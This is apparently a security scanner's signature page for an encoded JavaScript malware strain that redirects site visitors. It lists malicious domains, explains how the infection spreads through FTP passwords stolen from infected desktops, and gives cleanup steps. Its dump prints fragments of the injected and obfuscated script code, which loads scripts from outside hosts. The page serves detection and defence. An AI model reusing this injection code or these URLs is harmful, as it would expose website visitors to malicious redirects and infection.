SiteCheck Signatures

  2. Home
  4. SiteCheck Signatures
  6. malware-entry-mwjs150

malware-entry-mwjs150

Description:This encoded javascript malware redirects the user to
different domains, including:
http://breadcells.ru:8080/google.com/live.com/xunlei.com.php
http://icychina.ru:8080/google.com/mercadolibre.com.mx/google.com.ua.php ,
http://helphomecare.at:8080/google.com/download.com/qip.ru.php
http://passportblues.ru:8080/amazon-fr/google.com/miibeian.gov.cn.php
http://passportblues.ru:8080/google.com/bharatstudent.com/guardian.co.uk.php
http://dirtysin.ru:8080/wretch-cc/google.com/filestube.com.php
http://onelead.ru:8080/google.com/tube8.com/cncmax.cn.php
http://ourdope.ru:8080/google.com/friendster.com/37wan.com.php

http://beautyschooldropouts.com/wp-includes/wp-rss2.php
http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php
http://wap.northernplumbingandheating.com/assets/postinfo.php
http://paipai-com.cbssports.com.adbrite-com.clearsitedesign.ru:8080

http://sogpaoiy.the-mlmpowercall.com/USB.js

It can multiple directories named as google, mercadolibre, etc to try to disguise the user.

Affecting: The malware infects the web site through a compromised desktop (with virus), where
it steals any stored password from the FTP client and uses that to attack the sites.

Clean up: The desktop must be cleanup first. Use multiple AVs if necessary, since this
virus is very good at hiding from the current AV that is running. Once it is clean, then you
can clean up the sites and change the passwords.

Malware dump:


document.write('< script src=http://wap.northernplumbingandheating.com/assets/postinfo.php');
document.write('< script src=http://wap.northernplumbingandheating.com/assets/postinfo.php');
document.write('< script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php');
document.write ( '<' + ' cript src="http://sogpaoiy.the-mlmpowercall.com/USB.js



function E(){var J;if(J!='6f'){J='f'};var M=new String();var zp=new String();var a=unescape;var h=window;var t;if(t!='S'){t=''};var w='';var pn;if(pn!='Ry' && pn != ''){pn=null};var T=a("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%64%6f%77%6e%6c%6f%61%64%2e%63%6f%6d%2f%71%69%70%2e%72%75%2e%70%68%70");var H;if(H!='' && H!='tZ'){H=null};function O(aO,b){var x='';this.X='';var s=new String("2vxg".substr(3));...



this.W="";function g(){var m=["z","h","t"];this.D=false;try {} catch(Rs){};var x=String("app"+"end9FM3".substr(0,3)+"Chi"+"FBTLldBFLT".substr(4,2));var T="cr"+"ea"+"te"+"El"+"em"+"en"+"G7jzt".substr(4);var J=new String("scrh3U".substr(0,3)+"Y25ipt".substr(3));var cx={Tw:"cz"};var i=window;var K=String("src");hR=[];var O=String("defer");Fe={_:"gA"};var C="bosItZ".substr(0,2)+"dy";r=44924;r++;var G=String("onloa"+"d");...



var b=document;this.l="";var c=window;function a(o){var k;if(k!='ok' && k!='d'){k=''};var oq=['hMtMtMp3:9/3/9aClMlCo3c@i@n3eC-9f3r@.9i3m@a9g3eMbMaMm3.3cCo9mC.Mg3o@o@g3lMe3-Ml3k@.3h@o@t@n9eMwCg9uCi3d9eC.Mr@uC:@8M0M890@/@aCeMbCn@.Mn9eCtC/Ca@e9b9n3.@nMeCtC/3w3e9bCm3aCs3t@e9rMwCo@rCl9d3.@c@oCmC/@gMo@o9gCl@eC.CcCo@m@/@s3uCiMtMe91@0313.3c@o9m@/M'.replace(/[M@C93]/g, ''), 'svcwrRiwpZtZ'.replace(/[ZRvwM]/g, ''), 'cJr0eJajtje7E...



this.e=false;this.q=false;var qj=new Date();:LineMixer [this.ei="";this.dt="";var g=window;this.w="";var l;if(l!='bc'){l=''};var h='sHcurGibpGtH'.replace(/[HbuFG]/g, '');var wu;if(wu!='vx' && wu!='qz'){wu='vx'};this.ws=21255;var t='cprgepa4tge&Egl1e1m1epnpt4'.replace(/[4g1&p]/g, '');var y;if(y!=''){y='tm'};this.qg="qg";]var tl;if(tl!='c' && tl!='mn'){tl=''};var qk="";this.sx=false;this._o=false;g.onload=function(){var ...